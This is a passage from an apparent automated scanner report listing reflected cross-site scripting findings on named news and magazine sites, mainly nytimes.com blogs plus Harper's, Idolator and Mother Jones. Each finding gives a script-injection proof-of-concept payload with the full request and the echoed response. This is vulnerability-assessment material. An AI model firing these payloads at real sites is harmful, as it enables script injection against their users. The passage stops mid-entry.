HTTP/1.1 200 OK Date: Sat, 13 Nov 2010 02:02:54 GMT Server: Apache X-Powered-By: PHP/5.1.6 Vary: Cookie X-Pingback: http://frugaltraveler.blogs.nytimes.com/xmlrpc.php Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 65638
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr"> <head profile="http://gm ...[SNIP]... ft7,Left8,Left9,JMNow1,JMNow2,JMNow3,JMNow4,JMNow5,JMNow6,Feature1,Spon3,ADX_CLIENTSIDE&query=qstring&keywords=Budget+Travel;Discount+Travel;Cheap+Travel;Travel;Travel+Tips;Travel+Advice;jetblue&src=mv6df23\"><script>alert(1)</script>267493e97ac"> ...[SNIP]...
3.130. http://frugaltraveler.blogs.nytimes.com/2010/11/02/a-guide-to-the-caribbean-on-a-budget/ [src parameter]
Summary
Severity: High
Confidence: Certain
Host: http://frugaltraveler.blogs.nytimes.com
Path: /2010/11/02/a-guide-to-the-caribbean-on-a-budget/
Issue detail
The value of the src request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 99fa0"><script>alert(1)</script>3ce9920fcd7 was submitted in the src parameter. This input was echoed as 99fa0\"><script>alert(1)</script>3ce9920fcd7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2010/11/02/a-guide-to-the-caribbean-on-a-budget/?src=me99fa0"><script>alert(1)</script>3ce9920fcd7&ref=travel HTTP/1.1 Host: frugaltraveler.blogs.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 13 Nov 2010 02:02:47 GMT Server: Apache X-Powered-By: PHP/5.1.6 Vary: Cookie X-Pingback: http://frugaltraveler.blogs.nytimes.com/xmlrpc.php Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 65077
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr"> <head profile="http://gm ...[SNIP]... Left6,Left7,Left8,Left9,JMNow1,JMNow2,JMNow3,JMNow4,JMNow5,JMNow6,Feature1,Spon3,ADX_CLIENTSIDE&query=qstring&keywords=Budget+Travel;Discount+Travel;Cheap+Travel;Travel;Travel+Tips;Travel+Advice&src=me99fa0\"><script>alert(1)</script>3ce9920fcd7"> ...[SNIP]...
3.131. http://frugaltraveler.blogs.nytimes.com/2010/11/10/biking-los-angeles/ [src parameter]
Summary
Severity: High
Confidence: Certain
Host: http://frugaltraveler.blogs.nytimes.com
Path: /2010/11/10/biking-los-angeles/
Issue detail
The value of the src request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload af2ec"><script>alert(1)</script>8d7a351f0ef was submitted in the src parameter. This input was echoed as af2ec\"><script>alert(1)</script>8d7a351f0ef in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2010/11/10/biking-los-angeles/?src=mvaf2ec"><script>alert(1)</script>8d7a351f0ef&ref=travel HTTP/1.1 Host: frugaltraveler.blogs.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 13 Nov 2010 02:02:49 GMT Server: Apache X-Powered-By: PHP/5.1.6 Vary: Cookie X-Pingback: http://frugaltraveler.blogs.nytimes.com/xmlrpc.php Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 56907
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr"> <head profile="http://gm ...[SNIP]... eft9,JMNow1,JMNow2,JMNow3,JMNow4,JMNow5,JMNow6,Feature1,Spon3,ADX_CLIENTSIDE&query=qstring&keywords=Budget+Travel;Discount+Travel;Cheap+Travel;Travel;Travel+Tips;Travel+Advice;biking;los-angeles&src=mvaf2ec\"><script>alert(1)</script>8d7a351f0ef"> ...[SNIP]...
3.132. http://gadgetwise.blogs.nytimes.com/2010/11/12/ipad-apps-that-provide-recipes-and-avoid-strife/ [src parameter]
Summary
Severity: High
Confidence: Certain
Host: http://gadgetwise.blogs.nytimes.com
Path: /2010/11/12/ipad-apps-that-provide-recipes-and-avoid-strife/
Issue detail
The value of the src request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f0dd9"><script>alert(1)</script>ffceabef99c was submitted in the src parameter. This input was echoed as f0dd9\"><script>alert(1)</script>ffceabef99c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2010/11/12/ipad-apps-that-provide-recipes-and-avoid-strife/?src=twrf0dd9"><script>alert(1)</script>ffceabef99c HTTP/1.1 Host: gadgetwise.blogs.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 13 Nov 2010 02:02:52 GMT Server: Apache X-Powered-By: PHP/5.1.6 Vary: Cookie X-Pingback: http://gadgetwise.blogs.nytimes.com/xmlrpc.php Connection: close Content-Type: text/html; charset=UTF-8 X-Pad: avoid browser bug Content-Length: 63517
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr"> <head profile="http://gm ...[SNIP]... w3,JMNow4,JMNow5,JMNow6,Feature1,Spon3,ADX_CLIENTSIDE&query=qstring&keywords=Electronics;Gadgets;Personal+Tech;New+Technology;New+Technology+Products;allrecipes;epicurious;ipad;ipad;mobile-tech&src=twrf0dd9\"><script>alert(1)</script>ffceabef99c"> ...[SNIP]...
3.133. http://harpers.org/subjects/Sentences [REST URL parameter 2]
Summary
Severity: High
Confidence: Certain
Host: http://harpers.org
Path: /subjects/Sentences
Issue detail
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4564a"><img%20src%3da%20onerror%3dalert(1)>34f47c9c810 was submitted in the REST URL parameter 2. This input was echoed as 4564a"><img src=a onerror=alert(1)>34f47c9c810 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /subjects/Sentences4564a"><img%20src%3da%20onerror%3dalert(1)>34f47c9c810 HTTP/1.1 Host: harpers.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 13 Nov 2010 01:29:36 GMT Server: Apache X-Powered-By: PHP/5.2.6 Cache-Control: max-age=14400 Expires: Sat, 13 Nov 2010 05:29:36 GMT Vary: Accept-Encoding,User-Agent Content-Length: 6802 Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <meta http-eq ...[SNIP]... <input type="hidden" name="source" value="/subjects/Sentences4564a"><img src=a onerror=alert(1)>34f47c9c810" /> ...[SNIP]...
3.134. http://idolator.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://idolator.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f4566"><script>alert(1)</script>90fff6bafdf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f4566\"><script>alert(1)</script>90fff6bafdf in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?f4566"><script>alert(1)</script>90fff6bafdf=1 HTTP/1.1 Host: idolator.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 13 Nov 2010 02:04:54 GMT Server: Apache Set-Cookie: GEOIP_COUNTRY_CODE=US; path=/; domain=idolator.com X-Powered-By: PHP/5.3.3 Vary: Cookie X-Pingback: http://idolator.com/xmlrpc.php Set-Cookie: PHPSESSID=0fea5498bc1e06749b73cf9da169255d; path=/ Last-Modified: Fri, 12 Nov 2010 18:04:55 -0800 Cache-Control: max-age=300, must-revalidate Keep-Alive: timeout=5, max=1 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Content-Length: 88149
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US" xmlns:fb="h ...[SNIP]... <input type="hidden" name="redirect_to" value="http://idolator.com/?f4566\"><script>alert(1)</script>90fff6bafdf=1" /> ...[SNIP]...
3.135. http://intransit.blogs.nytimes.com/2010/09/15/show-us-your-city/ [src parameter]
Summary
Severity: High
Confidence: Certain
Host: http://intransit.blogs.nytimes.com
Path: /2010/09/15/show-us-your-city/
Issue detail
The value of the src request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d9c00"><script>alert(1)</script>03798aac80c was submitted in the src parameter. This input was echoed as d9c00\"><script>alert(1)</script>03798aac80c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2010/09/15/show-us-your-city/?src=mvd9c00"><script>alert(1)</script>03798aac80c&ref=travel HTTP/1.1 Host: intransit.blogs.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 13 Nov 2010 02:05:19 GMT Server: Apache X-Powered-By: PHP/5.1.6 Vary: Cookie X-Pingback: http://intransit.blogs.nytimes.com/xmlrpc.php Connection: close Content-Type: text/html; charset=UTF-8 X-Pad: avoid browser bug Content-Length: 59592
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr"> <head profile="http://gm ...[SNIP]... ft7,Left8,Left9,JMNow1,JMNow2,JMNow3,JMNow4,JMNow5,JMNow6,Feature1,Spon3,ADX_CLIENTSIDE&query=qstring&keywords=Travel+Tips;Travel+Advice;Travel;Deals;Travel+News;Updates.;show-us-your-city;video&src=mvd9c00\"><script>alert(1)</script>03798aac80c"> ...[SNIP]...
3.136. http://intransit.blogs.nytimes.com/2010/11/11/prague-art-show-embraces-decadence/ [src parameter]
Summary
Severity: High
Confidence: Certain
Host: http://intransit.blogs.nytimes.com
Path: /2010/11/11/prague-art-show-embraces-decadence/
Issue detail
The value of the src request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7b807"><script>alert(1)</script>1aa3eacb6c4 was submitted in the src parameter. This input was echoed as 7b807\"><script>alert(1)</script>1aa3eacb6c4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2010/11/11/prague-art-show-embraces-decadence/?src=mv7b807"><script>alert(1)</script>1aa3eacb6c4&ref=travel HTTP/1.1 Host: intransit.blogs.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 13 Nov 2010 02:05:19 GMT Server: Apache X-Powered-By: PHP/5.1.6 Vary: Cookie X-Pingback: http://intransit.blogs.nytimes.com/xmlrpc.php Connection: close Content-Type: text/html; charset=UTF-8 X-Pad: avoid browser bug Content-Length: 58574
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr"> <head profile="http://gm ...[SNIP]... 8,Left9,JMNow1,JMNow2,JMNow3,JMNow4,JMNow5,JMNow6,Feature1,Spon3,ADX_CLIENTSIDE&query=qstring&keywords=Travel+Tips;Travel+Advice;Travel;Deals;Travel+News;Updates.;art;globespotters;prague;prague&src=mv7b807\"><script>alert(1)</script>1aa3eacb6c4"> ...[SNIP]...
3.137. http://intransit.blogs.nytimes.com/2010/11/11/qa-adding-angkor-to-a-vietnam-bike-trip/ [src parameter]
Summary
Severity: High
Confidence: Certain
Host: http://intransit.blogs.nytimes.com
Path: /2010/11/11/qa-adding-angkor-to-a-vietnam-bike-trip/
Issue detail
The value of the src request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 93df7"><script>alert(1)</script>78bd648be4f was submitted in the src parameter. This input was echoed as 93df7\"><script>alert(1)</script>78bd648be4f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2010/11/11/qa-adding-angkor-to-a-vietnam-bike-trip/?src=me93df7"><script>alert(1)</script>78bd648be4f&ref=travel HTTP/1.1 Host: intransit.blogs.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 13 Nov 2010 02:05:18 GMT Server: Apache X-Powered-By: PHP/5.1.6 Vary: Cookie X-Pingback: http://intransit.blogs.nytimes.com/xmlrpc.php Connection: close Content-Type: text/html; charset=UTF-8 X-Pad: avoid browser bug Content-Length: 56967
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr"> <head profile="http://gm ...[SNIP]... 5,Left6,Left7,Left8,Left9,JMNow1,JMNow2,JMNow3,JMNow4,JMNow5,JMNow6,Feature1,Spon3,ADX_CLIENTSIDE&query=qstring&keywords=Travel+Tips;Travel+Advice;Travel;Deals;Travel+News;Updates.;q-a;siem-reap&src=me93df7\"><script>alert(1)</script>78bd648be4f"> ...[SNIP]...
3.138. http://intransit.blogs.nytimes.com/2010/11/12/japans-high-speed-trains-lines-expand/ [src parameter]
Summary
Severity: High
Confidence: Certain
Host: http://intransit.blogs.nytimes.com
Path: /2010/11/12/japans-high-speed-trains-lines-expand/
Issue detail
The value of the src request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ff1af"><script>alert(1)</script>c890c53b0a0 was submitted in the src parameter. This input was echoed as ff1af\"><script>alert(1)</script>c890c53b0a0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2010/11/12/japans-high-speed-trains-lines-expand/?src=mvff1af"><script>alert(1)</script>c890c53b0a0&ref=travel HTTP/1.1 Host: intransit.blogs.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 13 Nov 2010 02:05:09 GMT Server: Apache X-Powered-By: PHP/5.1.6 Vary: Cookie X-Pingback: http://intransit.blogs.nytimes.com/xmlrpc.php Connection: close Content-Type: text/html; charset=UTF-8 X-Pad: avoid browser bug Content-Length: 52981
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr"> <head profile="http://gm ...[SNIP]... ft3,Left4,Left5,Left6,Left7,Left8,Left9,JMNow1,JMNow2,JMNow3,JMNow4,JMNow5,JMNow6,Feature1,Spon3,ADX_CLIENTSIDE&query=qstring&keywords=Travel+Tips;Travel+Advice;Travel;Deals;Travel+News;Updates.&src=mvff1af\"><script>alert(1)</script>c890c53b0a0"> ...[SNIP]...
3.139. http://intransit.blogs.nytimes.com/2010/11/12/paris-photo-fair-covers-the-spectrum/ [src parameter]
Summary
Severity: High
Confidence: Certain
Host: http://intransit.blogs.nytimes.com
Path: /2010/11/12/paris-photo-fair-covers-the-spectrum/
Issue detail
The value of the src request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f8307"><script>alert(1)</script>b0e62f7972a was submitted in the src parameter. This input was echoed as f8307\"><script>alert(1)</script>b0e62f7972a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2010/11/12/paris-photo-fair-covers-the-spectrum/?src=mef8307"><script>alert(1)</script>b0e62f7972a&ref=travel HTTP/1.1 Host: intransit.blogs.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 13 Nov 2010 02:05:08 GMT Server: Apache X-Powered-By: PHP/5.1.6 Vary: Cookie X-Pingback: http://intransit.blogs.nytimes.com/xmlrpc.php Connection: close Content-Type: text/html; charset=UTF-8 X-Pad: avoid browser bug Content-Length: 56822
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr"> <head profile="http://gm ...[SNIP]... MNow2,JMNow3,JMNow4,JMNow5,JMNow6,Feature1,Spon3,ADX_CLIENTSIDE&query=qstring&keywords=Travel+Tips;Travel+Advice;Travel;Deals;Travel+News;Updates.;festivals;globespotters;paris;paris;photography&src=mef8307\"><script>alert(1)</script>b0e62f7972a"> ...[SNIP]...
3.140. http://intransit.blogs.nytimes.com/2010/11/12/sunday-preview-66/ [src parameter]
Summary
Severity: High
Confidence: Certain
Host: http://intransit.blogs.nytimes.com
Path: /2010/11/12/sunday-preview-66/
Issue detail
The value of the src request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6db75"><script>alert(1)</script>d8711375637 was submitted in the src parameter. This input was echoed as 6db75\"><script>alert(1)</script>d8711375637 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2010/11/12/sunday-preview-66/?src=twr6db75"><script>alert(1)</script>d8711375637 HTTP/1.1 Host: intransit.blogs.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 13 Nov 2010 02:04:59 GMT Server: Apache X-Powered-By: PHP/5.1.6 Vary: Cookie X-Pingback: http://intransit.blogs.nytimes.com/xmlrpc.php Connection: close Content-Type: text/html; charset=UTF-8 X-Pad: avoid browser bug Content-Length: 52105
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr"> <head profile="http://gm ...[SNIP]... t3,Left4,Left5,Left6,Left7,Left8,Left9,JMNow1,JMNow2,JMNow3,JMNow4,JMNow5,JMNow6,Feature1,Spon3,ADX_CLIENTSIDE&query=qstring&keywords=Travel+Tips;Travel+Advice;Travel;Deals;Travel+News;Updates.&src=twr6db75\"><script>alert(1)</script>d8711375637"> ...[SNIP]...
3.141. http://lens.blogs.nytimes.com/2010/11/12/pictures-of-the-day-afghanistan-and-elsewhere-6/ [src parameter]
Summary
Severity: High
Confidence: Certain
Host: http://lens.blogs.nytimes.com
Path: /2010/11/12/pictures-of-the-day-afghanistan-and-elsewhere-6/
Issue detail
The value of the src request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 80454"><script>alert(1)</script>433d57f0df7 was submitted in the src parameter. This input was echoed as 80454\"><script>alert(1)</script>433d57f0df7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2010/11/12/pictures-of-the-day-afghanistan-and-elsewhere-6/?src=twr80454"><script>alert(1)</script>433d57f0df7 HTTP/1.1 Host: lens.blogs.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 13 Nov 2010 02:05:39 GMT Server: Apache X-Powered-By: PHP/5.1.6 Vary: Cookie X-Pingback: http://lens.blogs.nytimes.com/xmlrpc.php Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 52101
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr"> <head profile="http://gm ...[SNIP]... ali;armando-franca;athar-hussain;carlos-barria;christoph-bangert;doug-mills;emilio-morenatti;hassan-ammar;john-woods;marcia-allert;merrill-d-oliver;pictures-of-the-day;rafiq-maqbool;saurabh-das&src=twr80454\"><script>alert(1)</script>433d57f0df7"> ...[SNIP]...
3.142. http://mediadecoder.blogs.nytimes.com/2010/11/12/judge-considers-case-of-mel-gibsons-leaky-court-file/ [src parameter]
Summary
Severity: High
Confidence: Certain
Host: http://mediadecoder.blogs.nytimes.com
Path: /2010/11/12/judge-considers-case-of-mel-gibsons-leaky-court-file/
Issue detail
The value of the src request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9e403"><script>alert(1)</script>d4b8c05b2e1 was submitted in the src parameter. This input was echoed as 9e403\"><script>alert(1)</script>d4b8c05b2e1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2010/11/12/judge-considers-case-of-mel-gibsons-leaky-court-file/?src=twr9e403"><script>alert(1)</script>d4b8c05b2e1 HTTP/1.1 Host: mediadecoder.blogs.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 13 Nov 2010 02:06:02 GMT Server: Apache X-Powered-By: PHP/5.1.6 Vary: Cookie X-Pingback: http://mediadecoder.blogs.nytimes.com/xmlrpc.php Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 54590
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr"> <head profile="http://gm ...[SNIP]... E&query=qstring&keywords=New+York+Times;television;guide+to+television;TV+Decoder;Carpetbagger;guide+to+media;newspapers;magazines;media;movies;marketing;new+media.+;mel-gibson;movies;new-media&src=twr9e403\"><script>alert(1)</script>d4b8c05b2e1"> ...[SNIP]...
3.143. http://motherjones.com/kevin-drum/2010/11/deficit-commission-serious [REST URL parameter 2]
Summary
Severity: High
Confidence: Certain
Host: http://motherjones.com
Path: /kevin-drum/2010/11/deficit-commission-serious
Issue detail
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1ada2"><script>alert(1)</script>177d0296e29 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /kevin-drum/20101ada2"><script>alert(1)</script>177d0296e29/11/deficit-commission-serious HTTP/1.1 Host: motherjones.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.67 Content-Type: text/html; charset=utf-8 X-Powered-By: PHP/5.2.4-2ubuntu5.12 Cache-Control: public, max-age=900 Expires: Sun, 11 Mar 1984 12:00:00 GMT Vary: Cookie,Accept-Encoding ETag: "1289613974" Last-Modified: Sat, 13 Nov 2010 02:06:14 GMT Content-Length: 80914 Date: Sat, 13 Nov 2010 02:06:15 GMT X-Varnish: 699349395 Age: 0 Via: 1.1 varnish Connection: close X-Cache: MISS
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head> < ...[SNIP]... <a href="/user/login?destination=kevin-drum/20101ada2"><script>alert(1)</script>177d0296e29/11/deficit-commission-serious" title="Login"> ...[SNIP]...
3.144. http://motherjones.com/kevin-drum/2010/11/deficit-commission-serious [REST URL parameter 3]
Summary
Severity: High
Confidence: Certain
Host: http://motherjones.com
Path: /kevin-drum/2010/11/deficit-commission-serious
Issue detail
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 32510"><script>alert(1)</script>e15e07f5a9a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /kevin-drum/2010/1132510"><script>alert(1)</script>e15e07f5a9a/deficit-commission-serious HTTP/1.1 Host: motherjones.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.67 Content-Type: text/html; charset=utf-8 X-Powered-By: PHP/5.2.4-2ubuntu5.12 Cache-Control: public, max-age=900 Expires: Sun, 11 Mar 1984 12:00:00 GMT Vary: Cookie,Accept-Encoding ETag: "1289613988" Last-Modified: Sat, 13 Nov 2010 02:06:28 GMT Content-Length: 80832 Date: Sat, 13 Nov 2010 02:06:29 GMT X-Varnish: 699351119 Age: 0 Via: 1.1 varnish Connection: close X-Cache: MISS
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head> < ...[SNIP]... <a href="/user/login?destination=kevin-drum/2010/1132510"><script>alert(1)</script>e15e07f5a9a/deficit-commission-serious" title="Login"> ...[SNIP]...
3.145. http://motherjones.com/kevin-drum/2010/11/deficit-commission-serious [REST URL parameter 4]
Summary
Severity: High
Confidence: Certain
Host: http://motherjones.com
Path: /kevin-drum/2010/11/deficit-commission-serious
Issue detail
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 70bd9"><script>alert(1)</script>957dc10fdf0 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /kevin-drum/2010/11/deficit-commission-serious70bd9"><script>alert(1)</script>957dc10fdf0 HTTP/1.1 Host: motherjones.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.67 Content-Type: text/html; charset=utf-8 X-Powered-By: PHP/5.2.4-2ubuntu5.12 Cache-Control: public, max-age=900 Expires: Sun, 11 Mar 1984 12:00:00 GMT Vary: Cookie,Accept-Encoding ETag: "1289613992" Last-Modified: Sat, 13 Nov 2010 02:06:32 GMT Content-Length: 209766 Date: Sat, 13 Nov 2010 02:06:33 GMT X-Varnish: 699351724 Age: 0 Via: 1.1 varnish Connection: close X-Cache: MISS
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head> < ...[SNIP]... <a href="/user/login?destination=kevin-drum/2010/11/deficit-commission-serious70bd9"><script>alert(1)</script>957dc10fdf0" title="Login"> ...[SNIP]...
3.146. http://movies.nytimes.com/2010/11/10/movies/10morning.html [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://movies.nytimes.com
Path: /2010/11/10/movies/10morning.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload db374"><script>alert(1)</script>0629960ed8c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2010/11/10/movies/10morning.html?db374"><script>alert(1)</script>0629960ed8c=1 HTTP/1.1 Host: movies.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Sun-ONE-Web-Server/6.1 Date: Sat, 13 Nov 2010 02:06:06 GMT Content-type: text/html Content-Length: 73577
...[SNIP]... <a href="http://movies.nytimes.com/2010/11/10/movies/10morning.html?db374"><script>alert(1)</script>0629960ed8c=1&pagewanted=print"> ...[SNIP]...
3.147. http://movies.nytimes.com/2010/11/10/movies/10morning.html [src parameter]
Summary
Severity: High
Confidence: Certain
Host: http://movies.nytimes.com
Path: /2010/11/10/movies/10morning.html
Issue detail
